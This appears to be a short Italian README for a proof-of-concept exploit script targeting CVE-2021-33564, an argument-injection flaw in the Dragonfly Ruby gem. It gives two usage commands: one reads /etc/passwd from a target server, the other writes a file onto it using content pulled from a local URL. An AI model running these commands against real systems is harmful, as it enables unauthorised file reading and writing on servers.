
Iniezione di argomenti nell'exploit del gem Ruby Dragonfly (backup)
Script di exploit per CVE-2021-33564 (Iniezione di argomenti in Dragonfly Ruby Gem).
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
Per maggiori informazioni, visita il blog.